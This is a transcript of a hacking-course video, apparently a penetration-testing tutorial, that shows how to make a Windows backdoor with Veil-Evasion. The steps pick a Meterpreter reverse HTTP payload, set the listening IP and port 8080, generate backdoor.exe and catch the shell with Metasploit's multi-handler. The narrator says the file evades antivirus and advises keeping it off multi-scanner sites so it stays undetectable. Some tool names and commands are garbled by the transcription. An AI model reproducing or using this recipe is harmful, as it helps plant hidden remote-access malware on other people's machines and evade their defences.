In the next few videos, we're going to talk about some attacks that you will need to have a backdoor that will spawn a shell back to your device. So I decided to make a video to explain to you how to create a backdoor and how to test this backdoor. So I'm going to explain it once so that in the future when we do more sophisticated attacks, I can skip this step because you know how to do it and you know how to test if it works or not. So to do this, we're actually going to use a tool called Vil Evasion. The reason I'm using this tool is because it creates backdoors that are not detectable by any antivirus. So when you create a backdoor in this tool, the antivirus programs will not detect this as a threat. So in order to install it, all you have to do is just apt-get install Vil Evasion in your terminal in Kali. The process might take some time. It's going to download around 600 megabytes of packages. Just every time you ask to do something, always say yes, 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 until the installation is finished. So it's very straightforward. All you have to do is just go here, do apt-get install Vil Evasion. You hit enter and it'll install it for you. Now for me, it's saying that it's already installed, so I don't need to install it. Now once you have it installed, I'm going to run it using the same command. So Vil Evasion. I'm going to hit enter. And as you can see now, I have 45 payloads loaded. So that's 45 different types of backdoors that I can create. If you want to list all these payloads and see what you have, you can just type in list to see them. And that's all the payloads that you can create. So for today's and for the next videos, we're going to be using CS Meterpreter Reverse HTTP. So in order to use this, all you have to do is just type in use 8 because that was number 8. So now it's showing me the options that this has, and you can use this the same way we were using Metasploit in the previous videos. The same way when you want to change an option, you type in set, option name, and then the value that you want to change it to. So we're going to do this the exact same way. So for example, to set up our IP address, this is our local IP address. So lhost, the same way that we were doing it with Metasploit. All you have to do is type in set lhost and put your IP address. So to see our IP address, we type in fconfig here. And as you can see that my IP address is 192.168.0.14. So I'm going to put that here. Now I'm doing this because we're going to do a reverse connection. So the target machine will be the machine that connects back to us. Now to make sure that the options are right, I'm going to type in info again. And we can see that my IP address is set up here. And then we can see the L port right here. So we have to set this up when we do the multi-handler, like what we did in the previous video. So now everything's done. I'm going to type in generate. And I'm going to type in the name of the file to create. So I'm going to call it backdoor. Now in practice, you don't want to call your backdoor, but for now we're testing, so I'm going to call it backdoor. And it's created, and it's saying it's written to this file. So my backdoor is stored in user share vil output compiled backdoor.exe. Now you get that exe, you can send it to any computer. Once you run this exe, it will try to connect back to your device on port 8080, like we set it up. So how do we listen to that port? We're going to do it the same way we did it when we ran our PowerSploit option. So I'm going to run MSF console. I'm going to quit this. So I'm going to type in quit and then exit. And then I'm going to write MSF console. So the next few steps are going to be exactly the same steps that we did when we did our PowerSploit option with the HID keyboard attack. So this will basically just allow us to listen on port 8080 for incoming connections. So I'm going to use exploit multi-handler. I actually don't need to run this command now because I'm already in it, but just to show you how to do it. Then I'm going to set my payload to Windows, same payload that we chose when we created the payload. So it was Windows interpreter reverse HTTP. I'm going to set the L port to 8080 like we did it before. And I'm going to set my L host to 192.168.0.14, the same values that we set up with the backdoor. So now we're just making sure that everything is right, and everything is right. So I'm going to type in exploit. And now I'm listening on connections. So what I'm going to do now is I'm going to copy this file to my target Windows machine. Again, this is not a practical attack. I just want to show you how to create a backdoor and how to test this backdoor. So I'm actually going to send this file to the target machine and run it from the target machine, and we'll see if this works or not. So if it works, we're going to use it in future videos to carry out our attacks. Now I have the file here, so I'm going to double click it and I'm going to run it. And if we go back here, as you can see, we got an interpreter session back from this IP, which is our target IP, to our IP. And if we do sysinfo, we'll see that we are inside the target machine. This is actually really useful. So even without this course, or without the things that you're going to learn in this course, creating a backdoor is really simple and comes in handy into many situations. So using Vil, you can create a backdoor that is not detectable by any antivirus, and you can confirm this using your own antivirus, but please don't upload it to the websites that test for multiple antiviruses, because they usually analyze the backdoor and then it won't be undetectable anymore. So, but it creates them undetectable, and there are safe websites that you can test with. I'm going to put them in the resources to test your backdoor with. And they're not detectable again by antiviruses. It works, it gives you reverse connection, and it's really small. So in the future videos, we're gonna need to use backdoors. I'm gonna skip through this step because we already know how to make them.